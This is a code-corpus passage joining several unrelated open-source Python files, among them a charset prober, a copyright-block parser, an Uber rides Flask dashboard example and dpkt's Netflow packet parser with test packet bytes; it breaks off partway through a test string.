response, content = http_request(uri)
if response.status == 200:
try:
d = simplejson.loads(content)
except StandardError, e:
raise AccessTokenRefreshError(str(e))
self.access_token = d['accessToken']
else:
raise AccessTokenRefreshError(content)
| lgpl-2.1 |
bud4/samba | source4/heimdal/lib/wind/util.py | 88 | 1978 | #!/usr/local/bin/python
# -*- coding: iso-8859-1 -*-
# $Id$
# Copyright (c) 2004 Kungliga Tekniska Högskolan
# (Royal Institute of Technology, Stockholm, Sweden).
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the Institute nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
def subList(l, sl) :
"""return the index of sl in l or None"""
lLen = len(l)
slLen = len(sl)
for i in range(lLen - slLen + 1):
j = 0
while j < slLen and l[i + j] == sl[j]:
j += 1
if j == slLen:
return i
return None
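# For example (illustration only):
#   subList([1, 2, 3, 4], [2, 3]) -> 1
#   subList([1, 2, 3, 4], [3, 5]) -> None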
| gpl-3.0 |
barykaed/Pelican-Test | activate/Lib/site-packages/pip/_vendor/requests/packages/chardet/sbcharsetprober.py | 2927 | 4793 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
from .compat import wrap_ord
SAMPLE_SIZE = 64
SB_ENOUGH_REL_THRESHOLD = 1024
POSITIVE_SHORTCUT_THRESHOLD = 0.95
NEGATIVE_SHORTCUT_THRESHOLD = 0.05
SYMBOL_CAT_ORDER = 250
NUMBER_OF_SEQ_CAT = 4
POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1
#NEGATIVE_CAT = 0
class SingleByteCharSetProber(CharSetProber):
def __init__(self, model, reversed=False, nameProber=None):
CharSetProber.__init__(self)
self._mModel = model
# TRUE if we need to reverse every pair in the model lookup
self._mReversed = reversed
# Optional auxiliary prober for name decision
self._mNameProber = nameProber
self.reset()
def reset(self):
CharSetProber.reset(self)
# char order of last character
self._mLastOrder = 255
self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT
self._mTotalSeqs = 0
self._mTotalChar = 0
# characters that fall in our sampling range
self._mFreqChar = 0
def get_charset_name(self):
if self._mNameProber:
return self._mNameProber.get_charset_name()
else:
return self._mModel['charsetName']
def feed(self, aBuf):
if not self._mModel['keepEnglishLetter']:
aBuf = self.filter_without_english_letters(aBuf)
aLen = len(aBuf)
if not aLen:
return self.get_state()
for c in aBuf:
order = self._mModel['charToOrderMap'][wrap_ord(c)]
if order < SYMBOL_CAT_ORDER:
self._mTotalChar += 1
if order < SAMPLE_SIZE:
self._mFreqChar += 1
if self._mLastOrder < SAMPLE_SIZE:
self._mTotalSeqs += 1
if not self._mReversed:
i = (self._mLastOrder * SAMPLE_SIZE) + order
model = self._mModel['precedenceMatrix'][i]
else: # reverse the order of the letters in the lookup
i = (order * SAMPLE_SIZE) + self._mLastOrder
model = self._mModel['precedenceMatrix'][i]
self._mSeqCounters[model] += 1
self._mLastOrder = order
if self.get_state() == constants.eDetecting:
if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD:
cf = self.get_confidence()
if cf > POSITIVE_SHORTCUT_THRESHOLD:
if constants._debug:
                        sys.stderr.write('%s confidence = %s, we have a '
'winner\n' %
(self._mModel['charsetName'], cf))
self._mState = constants.eFoundIt
elif cf < NEGATIVE_SHORTCUT_THRESHOLD:
if constants._debug:
                        sys.stderr.write('%s confidence = %s, below negative '
                                         'shortcut threshold %s\n' %
(self._mModel['charsetName'], cf,
NEGATIVE_SHORTCUT_THRESHOLD))
self._mState = constants.eNotMe
return self.get_state()
def get_confidence(self):
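        # Rough intuition: the share of observed "positive" bigram sequences,
        # normalized by the model's typical positive ratio and scaled by how
        # many characters fell inside the sampling range.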
r = 0.01
if self._mTotalSeqs > 0:
r = ((1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs
/ self._mModel['mTypicalPositiveRatio'])
r = r * self._mFreqChar / self._mTotalChar
if r >= 1.0:
r = 0.99
return r
| mit |
xzzz9097/android_external_skia | tools/copyright/fileparser.py | 232 | 2883 | '''
Copyright 2011 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
'''
import datetime
import re
def CreateParser(filepath):
"""Returns a Parser as appropriate for the file at this filepath.
"""
if (filepath.endswith('.cpp') or
filepath.endswith('.h') or
filepath.endswith('.c')):
return CParser()
else:
return None
class Parser(object):
"""Base class for all language-specific parsers.
"""
def __init__(self):
self._copyright_pattern = re.compile('copyright', re.IGNORECASE)
self._attribute_pattern = re.compile(
'copyright.*\D(\d{4})\W*(\w.*[\w.])', re.IGNORECASE)
def FindCopyrightBlock(self, comment_blocks):
"""Given a list of comment block strings, return the one that seems
like the most likely copyright block.
Returns None if comment_blocks was empty, or if we couldn't find
a comment block that contains copyright info."""
if not comment_blocks:
return None
for block in comment_blocks:
if self._copyright_pattern.search(block):
return block
def GetCopyrightBlockAttributes(self, comment_block):
"""Given a comment block, return a tuple of attributes: (year, holder).
If comment_block is None, or none of the attributes are found,
this will return (None, None)."""
if not comment_block:
return (None, None)
matches = self._attribute_pattern.findall(comment_block)
if not matches:
return (None, None)
first_match = matches[0]
return (first_match[0], first_match[1])
class CParser(Parser):
"""Parser that knows how to parse C/C++ files.
"""
DEFAULT_YEAR = datetime.date.today().year
DEFAULT_HOLDER = 'Google Inc.'
COPYRIGHT_BLOCK_FORMAT = '''
/*
* Copyright %s %s
*
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file.
*/
'''
def __init__(self):
super(CParser, self).__init__()
self._comment_pattern = re.compile('/\*.*?\*/', re.DOTALL)
def FindAllCommentBlocks(self, file_contents):
"""Returns a list of all comment blocks within these file contents.
"""
return self._comment_pattern.findall(file_contents)
def CreateCopyrightBlock(self, year, holder):
"""Returns a copyright block suitable for this language, with the
given attributes.
@param year year in which to hold copyright (defaults to DEFAULT_YEAR)
@param holder holder of copyright (defaults to DEFAULT_HOLDER)
"""
if not year:
year = self.DEFAULT_YEAR
if not holder:
holder = self.DEFAULT_HOLDER
return self.COPYRIGHT_BLOCK_FORMAT % (year, holder)
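# A rough end-to-end sketch for a C/C++ file (variable names are illustrative
# only):
#
#   parser = CreateParser('example.cpp')
#   blocks = parser.FindAllCommentBlocks(file_contents)
#   block = parser.FindCopyrightBlock(blocks)
#   year, holder = parser.GetCopyrightBlockAttributes(block)
#   new_block = parser.CreateCopyrightBlock(year, holder)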
| bsd-3-clause |
droidsec-cn/hooker | hooker_common/hooker_common/elasticsearch/Models/EsEvent.py | 3 | 2305 | # -*- coding: utf-8 -*-
#+---------------------------------------------------------------------------+
#| |
#| Android's Hooker |
#| |
#+---------------------------------------------------------------------------+
#| Copyright (C) 2011 Georges Bossert and Dimitri Kirchner |
#| This program is free software: you can redistribute it and/or modify |
#| it under the terms of the GNU General Public License as published by |
#| the Free Software Foundation, either version 3 of the License, or |
#| (at your option) any later version. |
#| |
#| This program is distributed in the hope that it will be useful, |
#| but WITHOUT ANY WARRANTY; without even the implied warranty of |
#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
#| GNU General Public License for more details. |
#| |
#| You should have received a copy of the GNU General Public License |
#| along with this program. If not, see <http://www.gnu.org/licenses/>. |
#+---------------------------------------------------------------------------+
#| @url : http://www.amossys.fr |
#| @contact : [email protected] |
#| @sponsors : Amossys, http://www.amossys.fr |
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Standard library imports
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Local imports
#+---------------------------------------------------------------------------+
from hooker.common import Logger
class EsEvent(object):
"""Object representation of an Event"""
| gpl-3.0 |
uber/rides-python-sdk | example/rider_dashboard.py | 1 | 2712 |
from flask import Flask, redirect, request, render_template
from example import utils # NOQA
from example.utils import import_app_credentials
from uber_rides.auth import AuthorizationCodeGrant
from uber_rides.client import UberRidesClient
from collections import OrderedDict, Counter
app = Flask(__name__, template_folder="./")
credentials = import_app_credentials('config.rider.yaml')
auth_flow = AuthorizationCodeGrant(
credentials.get('client_id'),
credentials.get('scopes'),
credentials.get('client_secret'),
credentials.get('redirect_url'),
)
@app.route('/')
def index():
"""Index controller to redirect user to sign in with uber."""
return redirect(auth_flow.get_authorization_url())
@app.route('/uber/connect')
def connect():
"""Connect controller to handle token exchange and query Uber API."""
# Exchange authorization code for acceess token and create session
session = auth_flow.get_session(request.url)
client = UberRidesClient(session)
# Fetch profile for rider
profile = client.get_rider_profile().json
# Fetch all trips from history endpoint
trips = []
i = 0
while True:
try:
response = client.get_rider_trips(
limit=50,
offset=i)
i += 50
if len(response.json['history']) > 0:
trips += response.json['history']
else:
break
except:
break
pass
# Compute trip stats for # of rides and distance
total_rides = 0
total_distance_traveled = 0
# Compute ranked list of # trips per city
cities = list()
for ride in trips:
cities.append(ride['start_city']['display_name'])
# only parse actually completed trips
if ride['distance'] > 0:
total_rides += 1
total_distance_traveled += int(ride['distance'])
total_cities = 0
locations_counter = Counter(cities)
locations = OrderedDict()
cities_by_frequency = sorted(cities, key=lambda x: -locations_counter[x])
for city in list(cities_by_frequency):
if city not in locations:
total_cities += 1
locations[city] = cities.count(city)
return render_template('rider_dashboard.html',
profile=profile,
trips=trips,
locations=locations,
total_rides=total_rides,
total_cities=total_cities,
total_distance_traveled=total_distance_traveled
)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000, debug=True)
| mit |
ashumeow/pcaphar | src/third_party/dpkt/dpkt/netflow.py | 15 | 14827 | # $Id: netflow.py 23 2006-11-08 15:45:33Z dugsong $
"""Cisco Netflow."""
import itertools, struct
import dpkt
class NetflowBase(dpkt.Packet):
"""Base class for Cisco Netflow packets."""
__hdr__ = (
('version', 'H', 1),
('count', 'H', 0),
('sys_uptime', 'I', 0),
('unix_sec', 'I', 0),
('unix_nsec', 'I', 0)
)
def __len__(self):
return self.__hdr_len__ + (len(self.data[0]) * self.count)
def __str__(self):
# for now, don't try to enforce any size limits
self.count = len(self.data)
return self.pack_hdr() + ''.join(map(str, self.data))
def unpack(self, buf):
dpkt.Packet.unpack(self, buf)
buf = self.data
l = []
while buf:
flow = self.NetflowRecord(buf)
l.append(flow)
buf = buf[len(flow):]
self.data = l
class NetflowRecordBase(dpkt.Packet):
"""Base class for netflow v1-v7 netflow records."""
# performance optimizations
def __len__(self):
# don't bother with data
return self.__hdr_len__
def __str__(self):
# don't bother with data
return self.pack_hdr()
def unpack(self, buf):
# don't bother with data
for k, v in itertools.izip(self.__hdr_fields__,
struct.unpack(self.__hdr_fmt__, buf[:self.__hdr_len__])):
setattr(self, k, v)
self.data = ""
class Netflow1(NetflowBase):
"""Netflow Version 1."""
class NetflowRecord(NetflowBase.NetflowRecordBase):
"""Netflow v1 flow record."""
__hdr__ = (
('src_addr', 'I', 0),
('dst_addr', 'I', 0),
('next_hop', 'I', 0),
('input_iface', 'H', 0),
('output_iface', 'H', 0),
('pkts_sent', 'I', 0),
('bytes_sent', 'I', 0),
('start_time', 'I', 0),
('end_time', 'I', 0),
('src_port', 'H', 0),
('dst_port', 'H', 0),
('pad1', 'H', 0),
('ip_proto', 'B', 0),
('tos', 'B', 0),
('tcp_flags', 'B', 0),
('pad2', 'B', 0),
('pad3', 'H', 0),
('reserved', 'I', 0)
)
# FYI, versions 2-4 don't appear to have ever seen the light of day.
class Netflow5(NetflowBase):
"""Netflow Version 5."""
__hdr__ = NetflowBase.__hdr__ + (
('flow_sequence', 'I', 0),
('engine_type', 'B', 0),
('engine_id', 'B', 0),
('reserved', 'H', 0),
)
class NetflowRecord(NetflowBase.NetflowRecordBase):
"""Netflow v5 flow record."""
__hdr__ = (
('src_addr', 'I', 0),
('dst_addr', 'I', 0),
('next_hop', 'I', 0),
('input_iface', 'H', 0),
('output_iface', 'H', 0),
('pkts_sent', 'I', 0),
('bytes_sent', 'I', 0),
('start_time', 'I', 0),
('end_time', 'I', 0),
('src_port', 'H', 0),
('dst_port', 'H', 0),
('pad1', 'B', 0),
('tcp_flags', 'B', 0),
('ip_proto', 'B', 0),
('tos', 'B', 0),
('src_as', 'H', 0),
('dst_as', 'H', 0),
('src_mask', 'B', 0),
('dst_mask', 'B', 0),
('pad2', 'H', 0),
)
class Netflow6(NetflowBase):
"""Netflow Version 6.
XXX - unsupported by Cisco, but may be found in the field.
"""
__hdr__ = Netflow5.__hdr__
class NetflowRecord(NetflowBase.NetflowRecordBase):
"""Netflow v6 flow record."""
__hdr__ = (
('src_addr', 'I', 0),
('dst_addr', 'I', 0),
('next_hop', 'I', 0),
('input_iface', 'H', 0),
('output_iface', 'H', 0),
('pkts_sent', 'I', 0),
('bytes_sent', 'I', 0),
('start_time', 'I', 0),
('end_time', 'I', 0),
('src_port', 'H', 0),
('dst_port', 'H', 0),
('pad1', 'B', 0),
('tcp_flags', 'B', 0),
('ip_proto', 'B', 0),
('tos', 'B', 0),
('src_as', 'H', 0),
('dst_as', 'H', 0),
('src_mask', 'B', 0),
('dst_mask', 'B', 0),
('in_encaps', 'B', 0),
('out_encaps', 'B', 0),
('peer_nexthop', 'I', 0),
)
class Netflow7(NetflowBase):
"""Netflow Version 7."""
__hdr__ = NetflowBase.__hdr__ + (
('flow_sequence', 'I', 0),
('reserved', 'I', 0),
)
class NetflowRecord(NetflowBase.NetflowRecordBase):
"""Netflow v7 flow record."""
__hdr__ = (
('src_addr', 'I', 0),
('dst_addr', 'I', 0),
('next_hop', 'I', 0),
('input_iface', 'H', 0),
('output_iface', 'H', 0),
('pkts_sent', 'I', 0),
('bytes_sent', 'I', 0),
('start_time', 'I', 0),
('end_time', 'I', 0),
('src_port', 'H', 0),
('dst_port', 'H', 0),
('flags', 'B', 0),
('tcp_flags', 'B', 0),
('ip_proto', 'B', 0),
('tos', 'B', 0),
('src_as', 'H', 0),
('dst_as', 'H', 0),
('src_mask', 'B', 0),
('dst_mask', 'B', 0),
('pad2', 'H', 0),
('router_sc', 'I', 0),
)
# No support for v8 or v9 yet.
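# Illustrative parsing sketch (assumed usage; udp_payload stands for the raw
# bytes of a NetFlow v5 export packet):
#
#   nf = Netflow5(udp_payload)
#   for rec in nf.data:
#       print rec.src_addr, rec.dst_addr, rec.pkts_sent, rec.bytes_sent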
if __name__ == '__main__':
import unittest
class NetflowV1TestCase(unittest.TestCase):
sample_v1 = "\x00\x01\x00\x18gza<B\x00\xfc\x1c$\x93\x08p\xac\x01 W\xc0\xa8c\xf7\n\x00\x02\x01\x00\x03\x00\n\x00\x00\x00\x01\x00\x00\x02(gz7,gz7,\\\x1b\x00P\xac\x01\x11,\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x18S\xac\x18\xd9\xaa\xc0\xa82\x02\x00\x03\x00\x19\x00\x00\x00\x01\x00\x00\x05\xdcgz7|gz7|\xd8\xe3\x00P\xac\x01\x06,\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x14\x18\xac\x18\x8d\xcd\xc0\xa82f\x00\x03\x00\x07\x00\x00\x00\x01\x00\x00\x05\xdcgz7\x90gz7\x90\x8a\x81\x17o\xac\x01\x066\x10\x00\x00\x00\x00\x04\x00\x03\xac\x0f'$\xac\x01\xe5\x1d\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x02(gz:8gz:8\xa3Q\x126\xac)\x06\xfd\x18\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x16E\xac#\x17\x8e\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x02(gz:Lgz:L\xc9\xff\x00P\xac\x1f\x06\x86\x02\x00\x00\x00\x00\x03\x00\x1b\xac\r\t\xff\xac\x01\x99\x95\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:Xgz:X\xee9\x00\x17\xac\x01\x06\xde\x10\x00\x00\x00\x00\x04\x00\x03\xac\x0eJ\xd8\xac\x01\xae/\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:hgz:h\xb3n\x00\x15\xac\x01\x06\x81\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01#8\xac\x01\xd9*\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:tgz:t\x00\x00\x83P\xac!\x01\xab\x10\x00\x00\x00\x00\x03\x00\x1b\xac\n`7\xac*\x93J\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:tgz:t\x00\x00\x00\x00\xac\x012\xa9\x10\x00\x00\x00\x00\x04\x00\x07\xac\nG\x1f\xac\x01\xfdJ\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x00(gz:\x88gz:\x88!\x99i\x87\xac\x1e\x06~\x02\x00\x00\x00\x00\x03\x00\x1b\xac\x01(\xc9\xac\x01B\xc4\xc0\xa82\x02\x00\x03\x00\x19\x00\x00\x00\x01\x00\x00\x00(gz:\x88gz:\x88}6\x00P\xac\x01\x06\xfe\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x0b\x08\xe8\xac\x01F\xe2\xc0\xa82\x02\x00\x04\x00\x19\x00\x00\x00\x01\x00\x00\x05\xdcgz:\x9cgz:\x9c`ii\x87\xac\x01\x06;\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x1d$\xac<\xf0\xc3\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:\x9cgz:\x9cF2\x00\x14\xac\x01\x06s\x18\x00\x00\x00\x00\x04\x00\x03\xac\x0b\x11Q\xac\x01\xde\x06\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:\xb0gz:\xb0\xef#\x1a+\xac)\x06\xe9\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x0cR\xd9\xac\x01o\xe8\xc0\xa82\x02\x00\x04\x00\x19\x00\x00\x00\x01\x00\x00\x05\xdcgz:\xc4gz:\xc4\x13n\x00n\xac\x19\x06\xa8\x10\x00\x00\x00\x00\x03\x00\x19\xac\x01=\xdd\xac\x01}\xee\xc0\xa82f\x00\x03\x00\x07\x00\x00\x00\x01\x00\x00\x00(gz:\xc4gz:\xc4\x00\x00\xdc\xbb\xac\x01\x01\xd3\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x0f(\xd1\xac\x01\xcc\xa5\xc0\xa82\x06\x00\x04\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz:\xd8gz:\xd8\xc5s\x17o\xac\x19\x06#\x18\x00\x00\x00\x00\x03\x00\x07\xac\n\x85[\xc0\xa8cn\n\x00\x02\x01\x00\x04\x00\n\x00\x00\x00\x01\x00\x00\x05\xdcgz:\xe4gz:\xe4\xbfl\x00P\xac\x01\x06\xcf\x10\x00\x00\x00\x00\x04\x00\x07\xac\x010\x1f\xac\x18!E\xc0\xa82f\x00\x03\x00\x07\x00\x00\x00\x01\x00\x00\x05\xdcgz;\x00gz;\x00\x11\x95\x04\xbe\xc0\xa8\x06\xea\x10\x00\x00\x00\x00\x03\x00\n\xac\x010\xb6\xac\x1e\xf4\xaa\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz;4gz;4\x88d\x00\x17\xac\x01\x06\x1f\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01#_\xac\x1e\xb0\t\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x05\xdcgz;Hgz;H\x81S\x00P\xac 
\x06N\x10\x00\x00\x00\x00\x03\x00\x1b\xac\x01\x04\xd9\xac\x01\x94c\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x02(gz;\\gz;\\U\x10\x00P\xac\x01\x06P\x18\x00\x00\x00\x00\x04\x00\x1b\xac\x01<\xae\xac*\xac!\xc0\xa82\x06\x00\x03\x00\x1b\x00\x00\x00\x01\x00\x00\x00\xfagz;\x84gz;\x84\x0c\xe7\x00P\xac\x01\x11\xfd\x10\x00\x00\x00\x00\x04\x00\x1b\xac\x01\x1f\x1f\xac\x17\xedi\xc0\xa82\x02\x00\x03\x00\x19\x00\x00\x00\x01\x00\x00\x05\xdcgz;\x98gz;\x98\xba\x17\x00\x16\xac\x01\x06|\x10\x00\x00\x00\x00\x03\x00\x07"
def testPack(self):
pass
def testUnpack(self):
nf = Netflow1(self.sample_v1)
assert len(nf.data) == 24
#print repr(nfv1)
class NetflowV5TestCase(unittest.TestCase):
sample_v5 = '\x00\x05\x00\x1d\xb5\xfa\xc9\xd0:\x0bAB&Vw\xde\x9bsv1\x00\x01\x00\x00\xac\n\x86\xa6\xac\x01\xaa\xf7\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x81\x14\xb5\xfa\x81\x1452\x00P\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x91D\xac\x14C\xe4\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x9b\xbd\xb5\xfa\x9b\xbd\x00P\x85\xd7\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x17\xe2\xd7\xac\x01\x8cV\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfao\xb8\xb5\xfao\xb8v\xe8\x17o\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0e\xf2\xe5\xac\x01\x91\xb2\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x00\xfa\xb5\xfa\x81\xee\xb5\xfa\x81\xee\xd0\xeb\x00\x15\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\nCj\xac)\xa7\t\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x85\x92\xb5\xfa\x85\x92\x8c\xb0\x005\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x96=\xac\x15\x1a\xa8\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x86\xe0\xb5\xfa\x86\xe0\xb4\xe7\x00\xc2\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01V\xd1\xac\x01\x86\x15\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa}:\xb5\xfa}:[Q\x00P\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac2\xf1\xb1\xac)\x19\xca\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x83\xc3\xb5\xfa\x83\xc3\x16,\x00\x15\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0cA4\xac\x01\x9az\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x8d\xa7\xb5\xfa\x8d\xa7\x173\x00\x15\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x1e\xd2\x84\xac)\xd8\xd2\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x8e\x97\xb5\xfa\x8e\x977*\x17o\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x85J\xac 
\x11\xfc\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x884\xb5\xfa\x884\xf5\xdd\x00\x8f\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x04\x80\xac<[n\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x9dr\xb5\xfa\x9drs$\x00\x16\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xb9J\xac"\xc9\xd7\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x90r\xb5\xfa\x90r\x0f\x8d\x00\xc2\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac*\xa3\x10\xac\x01\xb4\x19\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x92\x03\xb5\xfa\x92\x03pf\x00\x15\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xabo\xac\x1e\x7fi\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x93\x7f\xb5\xfa\x93\x7f\x00P\x0b\x98\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0c\n\xea\xac\x01\xa1\x15\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfay\xcf\xb5\xfay\xcf[3\x17\xe0\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xbb\xb3\xac)u\x8c\n\x00\x02\x01\x00i\x00\xdb\x00\x00\x00\x01\x00\x00\x00\xfa\xb5\xfa\x943\xb5\xfa\x943\x00P\x1e\xca\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0fJ`\xac\x01\xab\x94\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x87[\xb5\xfa\x87[\x9a\xd6/\xab\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac*\x0f\x93\xac\x01\xb8\xa3\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x89\xbb\xb5\xfa\x89\xbbn\xe1\x00P\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x93\xa1\xac\x16\x80\x0c\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x00(\xb5\xfa\x87&\xb5\xfa\x87&\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\x83Z\xac\x1fR\xcd\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x90\r\xb5\xfa\x90\r\xf7*\x00\x8a\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x0c\xe0\xad\xac\x01\xa8V\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x9c\xf6\xb5\xfa\x9c\xf6\xe5|\x1a+\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x1e\xccT\xac<x&\n\x00\x02\x01\x02q\x00\xdb\x00\x00\x00\x01\x00\x00\x05\xdc\xb5\xfa\x80\xea\xb5\xfa\x80\xea\x00\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x01\xbb\x18\xac\x01|z\xc0\xa82\x16\x00i\x02q\x00\x00\x00\x01\x00\x00\x00\xfa\xb5\xfa\x88p\xb5\xfa\x88p\x00P\x0b}\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\x17\x0er\xac\x01\x8f\xdd\xc0\xa822\x02q\x00i\x00\x00\x00\x01\x00\x00\x02(\xb5\xfa\x89\xf7\xb5\xfa\x89\xf7\r\xf7\x00\x8a\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\xac\n\xbb\x04\xac<\xb0\x15\n\x00\